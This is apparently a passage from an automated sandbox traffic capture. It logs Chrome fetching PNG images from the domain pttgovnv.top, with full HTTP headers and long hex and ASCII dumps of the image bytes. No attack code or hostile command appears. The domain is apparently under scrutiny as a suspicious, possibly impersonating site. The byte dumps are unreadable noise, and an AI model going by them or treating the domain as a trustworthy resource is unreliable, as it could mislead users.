          2024-09-01 22:25:26 UTC1369INData Raw: 63 a8 8b 6e e6 08 1c f1 99 af 8b ee d3 16 e9 be 6b 3f c9 7b 94 fd 69 e6 00 37 b6 39 84 38 fe 79 80 b6 f1 ae 87 16 a3 d1 c0 cb ea d1 00 b7 16 e4 a6 45 fb f9 8c 5e a4 b1 75 08 71 4f ae 42 2b 03 5b b4 96 45 cb d6 e7 b5 d7 df b9 e7 68 8b d6 b3 74 a7 6b 9c 53 ba 4c 26 2c c4 b5 af 23 ce 7a e8 3e 1d d9 1c 42 1c 79 2a 82 8b 01 2d cb 76 2a a0 1a 01 6e cd a4 c3 57 c5 23 b9 9c ac 0e c7 62 cb 95 6b db 00 36 2a 5f 31 fd c7 75 f9 fa 9a 5e 8b 74 a3 41 9d f7 47 a8 8a 67 97 de d7 aa d3 cb 1c 6d a9 2b 74 dc e1 a2 ca dd 90 ed ce cb 5f 7a ea 42 15 aa 85 38 32 5c d9 5c ad 0f e8 3f 94 10 d7 30 f0 c5 09 ec 53 cb b7 7b 24 d7 01 49 ad 15 6d 5a 8b 5e e4 ec 8a dc 10 c0 aa 49 c0 ef 3e 7e 2f c2 d7 9f 9b 1e 5b 95 1e 8a be e9 81 f7 27 7d ec f7 29 c8 4d ed 69 ad b6 fb 51 d1 ae 2b 75 d1
          Data Ascii: cnk?{i798yE^uqOB+[EhtkSL&,#z>By*-v*nW#bk6*_1u^tAGgm+t_zB82\\?0S{$ImZ^I>~/['})MiQ+u
          2024-09-01 22:25:26 UTC1219INData Raw: ce 32 97 f5 bc c5 49 a8 ce df b7 19 ef d1 f4 3d 4d 4f 6e 37 2d c2 4f d3 65 fa d2 a4 95 30 05 e9 cb 1e ca bf af 30 17 95 e7 af 03 69 09 39 eb da da 10 e1 27 85 d3 f7 c5 ee c5 7e 70 da b0 05 ae d3 be da e1 bb 36 1d 97 37 7d 2e 7b 0a 51 db dc 0f bf 3c b2 cf b5 69 74 58 35 58 d7 de cb 13 21 ae af 20 77 ba 85 0a 2b 5a 16 46 55 eb db 03 ce 1a 06 ca 8b 9e fe f6 a6 e8 67 ce a8 49 c3 f5 9b d7 fc 9b 26 27 9e f7 29 d0 14 0d cb ee a6 a7 b2 6e 1b 9a a7 2d be e3 a2 e7 bf cf 1d e4 62 db 8e 8a db 56 ea 6d 87 b9 77 eb 2d 21 19 d7 29 ba c5 7e 2a 76 33 b1 6e 1c 7b af cb 65 18 6f 98 e3 2e f7 be 37 ed 69 ff b8 de c6 79 2d ed 03 e3 a2 df 56 a7 9b b4 cf 9d 3e b4 cf ad 0d 37 b8 19 c8 31 7f 53 b8 21 a6 bf 6c f2 f5 eb 57 a5 d0 f4 60 bd 9d 0e 23 76 ca e3 8c 07 66 1c 90 d3 ba ad 26
          Data Ascii: 2I=MOn7-Oe00i9'~p67}.{Q<itX5X! w+ZFUgI&')n-bVmw-!)~*v3n{eo.7iy-V>71S!lW`#vf&


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          84192.168.2.449828172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC599OUTGET /help/layout/images/46.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC732INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 44008
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"abe8-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h4NmWVk5aN3j%2FBDIqPXGf394YOLH4VUHljl%2FHPEZCeK0MJliC4QaIh8%2BEVvEbR%2BwoQbvdCEh%2F7ejEIxdhCNCegaLWi2sJsRKREeME5%2BCupPOrhyD10dMXqCcJNC28%2B4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1e4d9d435d-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC637INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 ab 75 49 44 41 54 78 da ec bd 07 9c 64 65 95 bf ff bd 95 73 e8 1c a6 c3 e4 04 13 c8 41 60 08 8a 0a 4a 10 cc 0a 98 70 55 74 8c ab 6b 42 d7 8f eb ae ba 80 fe 95 dd fd ad 0b 6c 02 13 49 85 c5 48 4e ce 30 03 0c 30 c0 84 ee 9e 9e ce d5 dd 55 5d 39 fe df f3 d6 bd d5 b7 aa ab 7b 7a 66 3a 54 77 9f 67 3e 35 15 ba e2 ad 1b 9e 3a e7 3d e7 55 72 b9 1c 18 86 61 18 86 61 98 85 85 c2 12 c7 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 2c 71 0c c3 30
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<uIDATxdesA`JpUtkBlIHN00U]9{zf:Twg>5:=Uraa0000100,q00,q0
          2024-09-01 22:25:26 UTC1369INData Raw: 31 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 0c 4b 1c c3 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 12 c7 30 0c 53 29 3c 55 df 5a 23 ce ac e2 54 a3 88 73 25 7f b9 56 81 02 ed 76 b9 13 53 d4 9d d9 31 bc 86 b6 f7 13 bb c1 21 71 96 50 af 0e e6 90 a3 cb 09 f1 f7 21 71 4a 9c d9 df 35 c4
          Data Ascii: 10100,q00K00K000010100,q00K00K0000100,q00,q00K000000100,q00,q00K00000S)<UZ#Ts%VvS1!qP!qJ5
          2024-09-01 22:25:26 UTC1369INData Raw: 86 99 67 9e a8 6f d9 62 84 72 bb 90 b6 cd 94 3a 35 ca 3e 6f aa b4 95 89 bc 99 ca 44 e0 98 85 4d 51 64 4e 27 71 e9 92 02 88 f4 b8 cc 3d 9f cd e1 da d3 fa 3b 79 7e 56 86 61 89 63 18 66 ae d1 52 a7 42 da 3e 33 2e 6f ea 39 c6 53 a7 c6 92 31 6f 1c 79 5b fc 32 97 3e a2 d4 15 8a 1f 38 c5 ca 30 2c 71 0c c3 cc 25 ea fc a6 37 0b 41 6b cb 0b da 78 f4 4d 9f 2e 95 91 37 96 b7 25 47 69 eb 91 0c 8a 8b 1e 32 c5 51 b9 4e 71 db f6 53 fb 78 5e 56 86 61 89 63 18 66 d6 50 a3 6f b7 6b 55 a7 a5 a9 53 fd b8 37 63 89 d0 b1 bc 2d 6d 99 cb e8 ce f5 e3 e5 74 32 77 9f 9a 62 e5 a8 1c c3 b0 c4 31 0c 33 93 a8 0d 7b ef 15 42 e6 2d 97 32 2d 7b 8e c5 39 b3 42 bf 3b 27 53 83 0d 61 c3 71 c9 69 28 9b c5 c0 49 56 2c db 95 84 4d 59 9c 35 b9 fa d6 24 7a 89 4b 97 3f 0f 0a 99 bb fc d4 3e ee 2d c7
          Data Ascii: gobr:5>oDMQdN'q=;y~VacfRB>3.o9S1oy[2>80,q%7AkxM.7%Gi2QNqSx^VacfPokUS7c-mt2wb13{B-2-{9B;'Saqi(IV,MY5$zK?>-
          2024-09-01 22:25:26 UTC1369INData Raw: 4c 25 e3 df 26 89 78 54 f4 e7 a1 c8 d2 c8 65 75 30 d4 fb a1 a8 ef d5 60 b7 cc d9 eb 5b 5f 88 23 39 38 0c c5 28 96 aa 10 26 57 7d 2d ea 56 b4 c9 bf 85 07 03 18 7a 6d 3f c6 02 c3 e3 f7 77 38 90 dc 7d 50 b6 ce 98 6d 68 5c 60 2e 93 81 d9 9a 5f 1e c1 d1 51 d8 3e 77 92 ac 98 3d 1a 68 6c dd 7c 15 46 18 f5 51 62 94 1d 27 d7 a6 16 3c b0 c8 31 cc 1c 63 e2 45 c0 30 73 2a 70 54 81 7a bb be 80 a1 70 60 2c e9 01 37 1f c5 0b 23 5e 20 d4 60 84 e5 a5 84 ec 6d 46 a7 23 a5 70 03 6e 21 46 17 6d 45 4e dc 97 a2 5e 10 b2 a1 cc 91 78 f6 79 00 fb d7 df 88 c0 e0 10 fa 0e f7 c0 5b 5b 0d 4f 63 3d aa 57 ad 40 24 30 82 78 28 2c c7 c6 11 ae 2a 3f dc b5 55 70 d6 d6 20 bd 7a 05 0e e0 0e b8 ff 38 0c df 2c 46 e4 ac 17 54 21 9b ce a8 e9 5e 93 8c 06 e6 36 2f c7 c0 8a 3d 68 3d 98 9d 52 da 28
          Data Ascii: L%&xTeu0`[_#98(&W}-Vzm?w8}Pmh\`._Q>w=hl|FQb'<1cE0s*pTzp`,7#^ `mF#pn!FmEN^xy[[Oc=W@$0x(,*?Up z8,FT!^6/=h=R(
          2024-09-01 22:25:26 UTC1369INData Raw: 01 1b ac 12 0b f0 63 a7 c2 ba bc 11 66 8b 05 06 4d 6a d4 e0 54 5e 2a e9 1c f9 51 f7 1e 07 0e 77 74 16 1e bf 6c d3 06 39 e5 16 bd af 78 68 0c f1 8e c3 ea 83 73 e3 4f 52 06 1a 0d d8 fd b3 87 b0 ec 89 f0 94 d2 96 3b c5 25 0b 11 9c a7 af 43 da 63 47 2c 1a 43 22 1a 9d 20 ba 34 bf ab 4d c8 21 49 6e 4c 2c 27 8a 5e 5a ac d6 7c f4 2d 16 2b ba bf c7 e7 43 e2 73 77 a3 66 78 e1 ec 9b 33 d0 8f 87 63 91 63 18 96 38 86 59 e0 02 a7 1f 03 67 2a d3 03 ce b8 00 04 4e 3b 40 8f 7e 7e 0b d2 2b 1b f3 d2 a6 8a 19 a5 4f 69 26 04 da 87 50 04 2b 2a 24 89 04 ce 5d e5 93 02 47 85 0e 74 3f 1a a3 46 b2 65 50 fb b8 51 53 5e 6a 80 0b 21 30 91 bd 9d 18 fb eb 2b 48 bd d0 8b 86 17 13 32 c5 7c 3c 04 b6 da 91 fb 9b 8b a4 48 11 cd 27 ac cb 4b 9c 78 8f d1 1d af 20 f9 f1 7b 8e 3b 3d 19 b8 ba 15
          Data Ascii: cfMjT^*Qwtl9xhsOR;%CcG,C" 4M!InL,'^Z|-+Cswfx3cc8Yg*N;@~~+Oi&P+*$]Gt?FePQS^j!0+H2|<H'Kx {;=
          2024-09-01 22:25:26 UTC1369INData Raw: 63 0a ab ae 7f 33 06 bc b3 fb fe a8 07 5f e0 6d f5 b3 2f b3 e3 d2 56 14 99 a6 db c4 0f 9f 6b 9e 6b 68 df ce 7b 13 86 61 89 63 98 39 e3 89 fa 96 cb 4d 50 6e 92 cd 7c 15 14 8d 7b d3 22 70 b3 3d 17 6a 6c 9d 03 c9 b7 d7 4b d1 9a 2d 86 36 db 90 6e af 95 82 41 55 a5 94 42 95 02 27 04 84 aa 3e b3 7b 3a e0 08 8d 4b 9c 8c 24 09 91 23 c1 a3 93 a5 d9 39 2f df 0f 49 9b 69 20 24 a3 82 c9 c7 3b e6 e5 3d 58 2f a8 2a 4a a5 6a 29 54 6a 5a 9c 7e f8 45 d8 6e fa 13 9c c1 04 ac 36 5b b1 c8 09 c2 d1 28 cc ef 5e 2f c7 22 ce 16 e9 77 ad 87 63 d3 f2 59 8f c6 01 28 fa 91 a3 8f 50 e7 b7 1b dc b4 b3 a1 ed 72 de ab 30 0c 4b 1c c3 cc 3a 8f d7 b5 b4 0b 81 bb dd a0 cd c6 00 dd 01 09 73 37 17 aa 69 5d 23 1c 97 9e 3e 6b d1 b8 90 10 08 f7 a7 df 2a 0b 14 a8 ff 9b d3 e7 81 d9 61 83 dd 6c 41
          Data Ascii: c3_m/Vkkh{ac9MPn|{"p=jlK-6nAUB'>{:K$#9/Ii $;=X/*Jj)TjZ~En6[(^/"wcY(Pr0K:s7i]#>k*alA
          2024-09-01 22:25:26 UTC1369INData Raw: 73 3c 18 1a 7f 1e a7 5d ae 1b f3 f5 1d 19 b5 29 c8 c4 e5 9c 3a 35 97 7a f9 33 3b 1b da ee 3d b9 af f3 61 de 13 31 4c 79 94 5c 05 a4 5f 18 a6 12 51 27 b6 df 2d 4e 6d d4 cb ca ac 46 de cc fa 86 be f3 30 a5 96 6c ff 71 eb 65 08 24 c2 13 fe 66 77 b9 10 f9 fc bd 30 04 32 b0 5c 50 0d 43 bd 07 96 a6 6a d8 d6 b5 c1 58 e5 86 b1 d6 8f e8 d0 30 c2 23 a3 f0 bb 3d 18 fa c4 9d 68 98 c5 29 c8 a3 35 06 98 07 33 33 36 a6 8b 29 a6 ef 44 0b 3c 7f 77 25 22 a1 31 d9 cf 8f d2 b7 34 33 04 b5 28 c9 c5 53 50 62 49 c4 f6 1c 40 aa 3b 80 96 4f 5d 09 7b 7d ad 1c a7 17 0d 0c a3 e7 95 d7 f3 0e e7 f7 22 f6 be 5f a0 d1 34 7f bf e9 69 9d 4e 8b 63 11 a5 75 a9 29 8b 3c cf 5f ef 4c 23 b7 e5 94 be ce 51 fe b6 19 86 25 8e 61 a6 0d a5 51 85 a8 7d 46 6b e6 ab 97 37 8b ee f2 5c 43 4d 78 2d 77 be
          Data Ascii: s<]):5z3;=a1Ly\_Q'-NmF0lqe$fw02\PCjX0#=h)5336)D<w%"143(SPbI@;O]{}"_4iNcu)<_L#Q%aQ}Fk7\CMx-w
          2024-09-01 22:25:26 UTC1369INData Raw: 01 46 02 97 cd 64 65 24 45 8e 85 13 62 47 02 47 7d c2 08 4a ab 3a bc 6e 38 7d 1e d8 eb aa 91 a8 5a 7a 9b 39 1d ec dd 27 af 93 97 ed 27 ad 91 cd 8e 97 12 a3 5e 05 de 4b ce 2c 12 38 2a 62 58 76 ca 16 29 70 23 bd fd 30 5a 2c 68 3d ed 24 ac d9 76 16 7c f5 b5 70 f9 bc c8 ee 78 0d d9 cf dc 8d e6 db e7 57 e0 e4 c1 a9 a4 a1 b6 d6 68 5b 9d 5b d5 c7 7b 2d 86 61 89 63 18 89 38 48 6c 17 a7 36 4a a3 1a 30 3e 05 90 41 3b 98 cc c3 ac 0c 7a 99 73 dc bc 1b d9 4f de 09 c7 cb dd f9 48 9b 90 37 2d 8a 6e b5 db 60 32 9b e5 65 aa 44 a4 82 06 12 3d 9a 5e 89 44 af ea c3 e7 2e b9 49 e8 63 24 71 6b da e4 32 32 78 1c 88 2c b1 8c 43 e4 ca e5 88 ea fa c5 91 c0 ad 38 e7 74 99 7a 4f aa 53 a1 f5 be f8 4a 5e fa ed 0e 34 6d 3d 11 91 47 5f 40 dd 6d 07 e6 5d de 34 14 75 db 33 94 6e 8b 90 db
          Data Ascii: Fde$EbGG}J:n8}Zz9''^K,8*bXv)p#0Z,h=$v|pxWh[[{-ac8Hl6J0>A;zsOH7-n`2eD=^D.Ic$qk22x,C8tzOSJ^4m=G_@m]4u3n
          2024-09-01 22:25:26 UTC1369INData Raw: 45 fa 99 db 9e 88 a1 f5 4f a1 69 cb 9b 9e aa 2e b1 ac 6e 7e 10 36 9b 0d 49 64 2b 36 9d 5a d8 0e 74 db ac 6e ac dc 65 5c a9 ca b0 c4 31 cc 92 58 e9 a7 1e 0b 57 a9 43 ff 0d 2b 9a e0 30 59 11 90 02 77 ec 12 46 32 b7 58 25 8e 7a e1 59 5a ea f3 02 97 29 56 36 f3 a6 15 4b 6e fa ad 69 8b dc 9e 24 72 b7 3c 88 4c 34 81 ec e9 ce 8a 7e af a5 d1 b8 42 db 11 1e 1b c7 b0 c4 31 cc e2 66 bc 2f dc c2 8a c2 91 9c e4 fa 47 30 f6 f9 bb 8f 4b e0 16 3b c9 5a 23 72 0e ab 14 b8 5c 89 b0 a5 4c 86 25 37 fd d6 51 89 dc 8b 49 18 7e fa 07 18 07 92 95 7f e0 9a bc 52 b5 9d bf 49 86 25 8e 61 16 ed 0a af 5c 4b 9e a6 60 61 45 e1 6c d4 0f ee df 77 2e 4a 81 1b f2 29 33 d7 fe e3 44 8f 1c 37 28 23 71 d9 5c d1 b8 b8 0c a5 0a fd 33 b3 cb 3b 74 82 65 51 8e 2b f4 0b 91 6b 3a 54 f9 a2 3b c5 d8 b8
          Data Ascii: EOi.n~6Id+6Ztne\1XWC+0YwF2X%zYZ)V6Kni$r<L4~B1f/G0K;Z#r\L%7QI~RI%a\K`aElw.J)3D7(#q\3;teQ+k:T;
          2024-09-01 22:25:26 UTC1369INData Raw: 7b 01 3e e3 fc 75 ad a3 19 1d 52 ff f2 7b 38 fd 5e 29 44 e1 6c 12 ae af 5e 8a c0 9b 6b 65 94 68 a6 49 74 f4 ca 34 a8 af a9 4e 5e 1f 19 1e 86 ef 3b 6f 9d f6 6b 91 24 5b e5 4c 0d e3 02 57 2e 5a 46 b7 19 85 90 4d 3b 9a 74 ba 03 8e 0b 4e 82 c1 60 94 d5 ad 72 7d 9a a5 20 9c 1c fb 76 55 23 96 fd d3 b5 68 7c c3 c9 e8 d9 f3 aa 10 46 13 a2 3f f9 03 7c 86 f9 db 55 7b 0f a4 91 7c ad 1b 55 cb 1a 31 36 32 0a e3 5b 4e 96 a9 f6 ce 8d e6 09 45 22 f4 3d 0c 5c e4 47 cb f7 af 83 62 b5 22 3c 14 90 cb 4d 09 c7 e0 9c 45 09 2d 9d 8a 4b dd be b9 c0 81 61 89 63 98 85 0c cd d0 40 05 0d 06 5d 41 83 56 8d 3a 5b 6d 45 2c 8f 8f c1 68 32 c2 e6 72 c8 54 0f 8d a3 32 bd f5 64 c4 af 5f 57 24 72 74 b9 f7 ad 35 a8 be ed 83 a8 be e0 54 29 1e c3 3d fd b0 bb 9c c8 3e b4 6f de 1b 0f fb 9e 8b c1
          Data Ascii: {>uR{8^)Dl^kehIt4N^;ok$[LW.ZFM;tN`r} vU#h|F?|U{|U162[NE"=\Gb"<ME-Kac@]AV:[mE,h2rT2d_W$rt5T)=>o


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          85192.168.2.449829104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:26 UTC361OUTGET /help/layout/images/43.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC724INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 18614
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"48b6-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwXXCr1uRCHSzMFpVNtsaP4zOxZeTd64n3Aug8IaoQ3c2ClS3vl1P5JgQCrLi%2FXuMEPEfa4u871hqP%2B3Gp27IYenDW8d9WtNRw%2B4zVnOSePEUHbUqztcKQDsrTSXixw%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad1e3985432e-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC645INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 48 43 49 44 41 54 78 da ec dd 0b 9c 5c 65 99 e7 f1 e7 84 90 fb a5 93 90 1b 10 ba 02 26 01 01 d3 80 82 e3 a8 69 44 57 47 64 d3 cc 38 82 33 ba 69 c6 11 77 57 19 1a c6 dd 61 76 d5 34 5e 56 66 75 a0 59 76 dc 51 3f 23 95 45 06 65 5c 48 06 71 9c 19 95 0e 8c 0a 08 a4 43 80 90 c4 24 1d 20 e4 9e 74 a7 73 bf d5 be 4f 9d f7 a4 ab ab eb 72 6e 75 ff 7d 3f 9f a2 43 77 5d 4e 9d 3a 55 e7 5f ef e5 79 9d 54 2a 25 00 00 00 a8 2d 0e 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<HCIDATx\e&iDWGd83iwWav4^VfuYvQ?#Ee\HqC$ tsOrnu}?Cw]N:U_yT*%-!Bq8
          2024-09-01 22:25:26 UTC1369INData Raw: 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 08 71 84 38 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 60 8d 60 17 00 00 80 6a 34 fa a1 9e 16 f6 42 7e b4 c4 01 00 80 6a 0b 6e ed e6 d2 66 2e
          Data Ascii: q8@ Bq8@ B!8q8Bq @!Bq8@!Bq8@ B!8``j4B~jnf.
          2024-09-01 22:25:26 UTC1369INData Raw: 8f fa 6b 8d cb a5 5d 1a ac fc 08 2d 71 00 00 84 0f 71 09 f3 63 73 91 ab 69 57 9f ae 9c a0 41 4e 43 5f 59 26 28 c4 59 cb ad 5c 0e 1c 3d 29 d3 1e 59 13 f6 e6 fd 26 2c 37 35 d2 f1 47 88 03 00 a0 78 50 eb cb 57 9f cc fc 5d 7f 3f b9 1a b6 d5 2b 09 72 e3 c5 33 6b 26 b8 65 fb fc 2f 36 ca 7d 3b 06 42 67 57 f3 3a 2d 6f 94 63 93 ee 54 00 00 72 07 37 6d 35 6b 17 b7 e5 ec 26 71 bb 4d 73 a9 68 80 2b 57 2d b7 72 d1 f1 7a 11 42 9c be 66 84 38 00 00 1a 2c b8 35 d9 10 d0 21 c3 bb 3c 3b 72 85 38 5b b4 b7 ec aa a1 24 48 a9 e8 84 0b 79 e1 f5 30 37 d5 89 24 0d b5 9a 03 dd a9 00 00 02 9c 3b d9 60 49 91 ab ad 30 97 d3 93 14 6c 29 11 2d 73 51 96 96 b8 7a 0e 6e d9 42 74 a9 2e 13 b7 76 5c 43 85 38 5a e2 00 00 f0 67 b1 b9 ec 33 e1 6d a5 b8 ab 28 94 25 bc 55 73 49 90 52 09 d8 a5 ba
          Data Ascii: k]-qqcsiWANC_Y&(Y\=)Y&,75GxPW]?+r3k&e/6};BgW:-ocTr7m5k&qMsh+W-rzBf8,5!<;r8[$Hy07$;`I0l)-sQznBt.v\C8Zg3m(%UsIR
          2024-09-01 22:25:26 UTC1369INData Raw: 28 dc fd 97 ea 3d 64 05 e8 52 bd be 11 82 5c 63 8c 89 7b 66 41 e6 38 1f 6f 6d b5 6e 13 e8 ba 89 5c 25 09 70 95 9c d5 e8 55 bc 4f 9a 37 70 77 0c cf a7 55 82 2d 88 bd cc 3c 6e 7b c4 c7 ec 0e d0 3a a1 cf b7 25 86 8a e4 fe 4f a6 9b ee 96 d4 9e 7f c8 7b 12 a8 26 a9 91 67 8b d3 fc 45 91 b3 de 57 fc ca 6b 3f 2f b2 ff b1 c2 d7 99 74 9d c8 45 df 0c 7c 52 93 cd b7 15 df d6 51 f3 c5 b9 f4 fb 7e 82 9c 7e 71 49 d4 c1 c7 85 f7 05 db 77 10 4e ed f8 fe d0 70 a0 c1 60 f6 7f 10 99 f9 ef 83 3c ae 4e 73 ec 0b f0 7e 0c 3d 4e f4 5f de 99 a8 ae 55 1b b4 35 78 f5 b5 e6 1f c5 42 d0 68 f3 a5 e2 87 c1 83 dc 5a f3 d1 bf ff a7 f1 bf 87 32 3c b6 6e 8f 7c f4 85 d7 fd 5c b5 21 c6 c4 35 4a 88 2b 34 e3 6e b5 0c ae 8b e8 ae 8d 48 b8 0b 1b 3e f4 c4 b2 b9 8a 36 49 4f 76 1d 51 be 8d 85 fc 00
          Data Ascii: (=dR\c{fA8omn\%pUO7pwU-<n{:%O{&gEWk?/tE|RQ~~qIwNp`<Ns~=N_U5xBhZ2<n|\!5J+4nH>6IOvQ
          2024-09-01 22:25:26 UTC1369INData Raw: 8c 3a a3 4e db 4d ce ff 2f 22 ab ff b9 ec ef a1 f6 59 93 e4 6b 6f 04 fe f8 de 22 01 4a cc 10 e2 aa 3f c8 f5 a5 83 d9 33 0b 74 7c 83 2e af a2 dd a1 da 15 aa 63 e4 3a 4f af f0 50 ba 40 b7 e5 f4 fd b2 9a 44 b9 e9 eb e0 ad 2e 81 7a 35 fd 66 73 92 f9 f3 fc 7f d7 70 37 e5 06 df 41 ce 69 fe 42 ad ed 81 84 0d 6a ad f6 df 61 96 b9 5a 9a e3 44 d8 6b c3 5d 8f fd d9 30 5f 86 ec 70 8c f4 04 a9 f6 a9 e3 d2 61 ed 8a 59 13 65 c1 59 e3 d2 e3 b5 1a ce 98 39 c1 de 43 73 bf 1a cb c3 6a 97 6a c0 10 a7 bd 6a ed f5 f4 c5 9d 10 37 18 e6 ba ec 3a ab 49 1b e4 96 d8 70 d7 25 ee 72 5d 7d 59 c1 2f 33 d0 b5 db cb c2 10 8f dc 6c 3f 20 97 9a fb 5a 61 c3 1c ad 73 e5 a3 e3 e3 3a 63 58 f1 00 79 3e 62 52 a3 e6 96 fd 51 d3 eb 40 8e d7 75 49 af 75 4f 30 c5 cc ff b2 88 f6 de 15 3c 09 8d 12 39
          Data Ascii: :NM/"Yko"J?3t|.c:OP@D.z5fsp7AiBjaZDk]0_paYeY9Csjjj7:Ip%r]}Y/3l? Zas:cXy>bRQ@uIuO0<9
          2024-09-01 22:25:26 UTC1369INData Raw: 69 78 da d2 64 bb 25 ef 09 78 d3 44 85 02 67 67 19 1f 6f 09 21 ae 80 6d 0f 4b ea 8d ae e1 0b d7 8f bd 52 e4 fc ff 56 db 61 46 03 c5 be 5f 8b ec 5f 25 a9 43 6b c4 39 a6 f3 0c 8e 06 ba 0b ad b4 2f 23 67 88 33 ce ec 87 49 97 89 4c f9 9d 6a 2f bb 52 3e ba dc d7 9e 95 e6 ac f1 4b 49 1d 7f fd 74 79 8d a2 fb 54 cb 6f 8c 35 e7 9f 29 8b ea 63 7f 6e 7d 40 52 6f 7e cb bc 87 f6 0e fd fd f8 f7 9a 4f d8 db 4b f6 1e ba e2 9c 89 e9 4b b6 37 07 8e c9 f3 6f 0e a4 97 3e bb 6f c7 40 be 9b b7 11 e2 ea 23 c8 f5 ca d0 6e a9 c9 e2 76 af 69 b8 6a b1 27 79 ef 44 ef 2d 5b e3 8d 9f 13 1b f8 7a 43 8f 55 1b 0c 73 6d b6 c5 c4 ef 98 39 bd 5e 77 3a 04 12 e4 3c c9 10 21 ae 12 53 d0 5b cb fd 80 b5 dc 75 10 90 8e 7b d9 e7 